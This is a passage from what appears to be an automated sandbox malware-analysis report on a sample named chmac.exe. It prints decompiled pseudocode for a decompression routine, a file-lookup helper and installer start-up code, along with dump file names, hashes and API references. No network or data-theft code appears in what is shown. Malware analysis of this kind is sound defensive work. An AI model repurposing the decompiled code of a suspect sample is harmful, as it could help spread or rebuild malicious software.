									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3, Relevance: 52.7, APIs: 16, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				signed short _t71;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					_t71 =  *_t20(); // executed
					E004059E3("1033", _t71 & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x70
